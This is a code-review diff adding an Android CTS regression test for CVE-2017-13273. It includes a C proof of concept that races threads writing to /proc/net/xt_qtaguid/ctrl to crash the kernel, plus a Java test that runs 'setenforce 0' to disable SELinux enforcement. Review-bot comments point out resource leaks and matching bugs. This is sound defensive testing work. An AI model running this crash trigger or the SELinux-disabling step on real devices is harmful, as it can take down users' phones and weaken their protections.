CTS test for Android Security b/65853158 b/72396737
Test: successful run of newly introduced CTS test case.
Bug: 65853158
Bug: 72396737
Change-Id: Ic6da1bfe405d8a4e3f2e89364b354e376aa5bd5a
Signed-off-by: JSinha <jimmi.sinha@harman.corp-partner.google.com>
(cherry picked from commit a7e3f29dd12724d2f7f3215db1c5fb28016a7794)
diff --git a/hostsidetests/security/AndroidTest.xml b/hostsidetests/security/AndroidTest.xml
index f881e64..9a54760 100755
--- a/hostsidetests/security/AndroidTest.xml
+++ b/hostsidetests/security/AndroidTest.xml
@@ -146,6 +146,7 @@
<!--__________________-->
<!-- Bulletin 2018-02 -->
<!-- Please add tests solely from this bulletin below to avoid merge conflict -->
+ <option name="push" value="CVE-2017-13273->/data/local/tmp/CVE-2017-13273" />
<option name="push" value="CVE-2017-13232->/data/local/tmp/CVE-2017-13232" />
<!--__________________-->
diff --git a/hostsidetests/security/securityPatch/CVE-2017-13273/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-13273/Android.mk
new file mode 100644
index 0000000..1cb7357
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-13273/Android.mk
@@ -0,0 +1,31 @@
+# Copyright (C) 2018 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-13273
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts vts sts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+LOCAL_CFLAGS += -Wall -Werror
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-13273/poc.c b/hostsidetests/security/securityPatch/CVE-2017-13273/poc.c
new file mode 100644
index 0000000..0856392
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-13273/poc.c
@@ -0,0 +1,136 @@
+/**
+ * Copyright (C) 2018 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+#define _GNU_SOURCE
+#include <errno.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <stdio.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/time.h>
+#include <sys/types.h>
+#include <unistd.h>
+
+#define MAX_THREAD 6
+
+int ctrl_fd;
+static int cmd;
+static int status[MAX_THREAD];
+static int sock_fd;
+
+void *thread_entry(void *arg) {
+ int index, len = 256, ret;
+ char buf[256];
+ index = (int)(unsigned long)arg;
+ memset(buf, 0x0, 256);
+ status[index] = 1;
+
+ // cmd =-1 signifies error in thread creation
+ while (cmd != 1 && cmd != -1) {
+ usleep(5);
+ }
+
+ if (cmd != -1) {
+ switch (index % 3) {
+ case 0:
+ len = sprintf(buf, "d %lu", (unsigned long)0);
+ break;
+ case 2:
+ len = sprintf(buf, "t %d", sock_fd);
+ break;
+ }
+
+ ret = write(ctrl_fd, buf, len);
+ }
+
+ status[index] = 2;
+ return NULL;
+}
+/*
+ *This PoC creates multiple threads to write /proc/net/xt_qtaguid/ctrl device
+ *which causes null pointer derefrences in netstat.
+ */
+int main() {
+ int fd, retry = 1024;
+ int ret, i, loop;
+ pthread_t tid[MAX_THREAD];
+
+ fork();
+ sock_fd = socket(AF_INET, SOCK_STREAM, 0);
+ while (retry--) {
+ cmd = 0;
+ for (i = 0; i < MAX_THREAD; i++) {
+ status[i] = 0;
+ }
+
+ fd = open("/dev/xt_qtaguid", O_RDONLY);
+ if (fd < 0) {
+ return -1;
+ }
+
+ ctrl_fd = open("/proc/net/xt_qtaguid/ctrl", O_RDWR);
+ if (ctrl_fd < 0) {
+ return -1;
+ }
+
+ for (i = 0; i < MAX_THREAD; i++) {
+ ret =
+ pthread_create(&tid[i], NULL, thread_entry, (void *)(unsigned long)i);
+ if (ret != 0) {
+ cmd = -1;
+ close(ctrl_fd);
+ }
+ }
+
+ loop = 1;
+ int count = 0;
+ // loop until all threads have status == 1
+ while (loop) {
+ loop = 0;
+ count = count + 1;
+ for (i = 0; i < MAX_THREAD; i++)
+ if (status[i] != 1) {
+ loop = 1;
+ break;
+ }
+
+ if (loop) {
+ usleep(5);
+ }
+ }
+
+ cmd = 1;
+ loop = 1;
+ while (loop) {
+ loop = 0;
+ count = count + 1;
+ for (i = 0; i < MAX_THREAD; i++)
+ if (status[i] != 2) {
+ loop = 1;
+ break;
+ }
+
+ if (loop) {
+ usleep(5);
+ }
+ }
+ close(fd);
+ }
+ return 0;
+}
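Review bot: In main(), a failed pthread_create() sets `cmd = -1` and closes `ctrl_fd` but the loop carries on, so the wait for every `status[i] == 1` can never finish (the missing thread never sets its slot) and the binary spins until the harness timeout. On the normal path `ctrl_fd` is never closed and the threads are never joined or detached, so each of the 1024 iterations leaks one descriptor and six threads. Depending on the device's limits, that can make `open()` or pthread_create() fail and end the run early or trigger the hang above. I would count the threads actually created, join them instead of polling for `status == 2`, and close both descriptors in every iteration, as sketched below. Separately, `cmd` and `status[]` are plain ints polled across threads without atomics, and the results of `fork()` and `socket()` are not checked.

```c
    int created = 0;
    for (i = 0; i < MAX_THREAD; i++) {
      ret =
          pthread_create(&tid[i], NULL, thread_entry, (void *)(unsigned long)i);
      if (ret != 0) {
        break;
      }
      created++;
    }

    if (created < MAX_THREAD) {
      cmd = -1;  // threads already started skip the write and exit
    } else {
      // ... unchanged: poll until every status[i] == 1 ...
      cmd = 1;
    }

    // Joining replaces the status == 2 polling and reclaims each thread.
    for (i = 0; i < created; i++) {
      pthread_join(tid[i], NULL);
    }
    close(ctrl_fd);
    close(fd);
    if (created < MAX_THREAD) {
      return -1;
    }
```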
diff --git a/hostsidetests/security/src/android/security/cts/Poc18_02.java b/hostsidetests/security/src/android/security/cts/Poc18_02.java
index 1d6c60d..a0fd9c1 100644
--- a/hostsidetests/security/src/android/security/cts/Poc18_02.java
+++ b/hostsidetests/security/src/android/security/cts/Poc18_02.java
@@ -33,4 +33,23 @@
"invalid attributes: usage=.{1,} content=.{1,} "+
"flags=.{1,} tags=\\[.{256,}\\].*", logcatOutput);
}
+
+ /**
+ * b/65853158
+ */
+ @SecurityTest
+ public void testPocCVE_2017_13273() throws Exception {
+ AdbUtils.runCommandLine("dmesg -c" ,getDevice());
+ AdbUtils.runCommandLine("setenforce 0",getDevice());
+ if(containsDriver(getDevice(), "/dev/xt_qtaguid") &&
+ containsDriver(getDevice(), "/proc/net/xt_qtaguid/ctrl")) {
+ AdbUtils.runPoc("CVE-2017-13273", getDevice(), 60);
+ String dmesgOut = AdbUtils.runCommandLine("cat /sys/fs/pstore/console-ramoops",
+ getDevice());
+ assertNotMatches("[\\s\\n\\S]*CVE-2017-132736 Tainted:" + "[\\s\\n\\S]*" +
+ "Kernel panic - not syncing: Fatal exception in interrupt", dmesgOut);
+ }
+ AdbUtils.runCommandLine("setenforce 1",getDevice());
+ }
}
+
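Review bot: The closing `setenforce 1` in testPocCVE_2017_13273 is skipped whenever runPoc, the pstore read or assertNotMatches throws, so a failing run leaves the device in SELinux permissive mode for every test that follows; wrap the body as `try { ... } finally { AdbUtils.runCommandLine("setenforce 1", getDevice()); }`. The pattern `CVE-2017-132736 Tainted:` looks like the 15-character truncated task name of the 64-bit binary (`CVE-2017-1327364`) only, so a panic caused by the 32-bit build (`CVE-2017-1327332`) would presumably not match and the test would pass on a vulnerable kernel; if that reading is right, `CVE-2017-13273[36] Tainted:` covers both. Also, as far as I can tell `dmesg -c` does not clear `/sys/fs/pstore/console-ramoops`, so a record left by an earlier crash could fail this test on a patched device; a comment stating which boot's log is being checked would help.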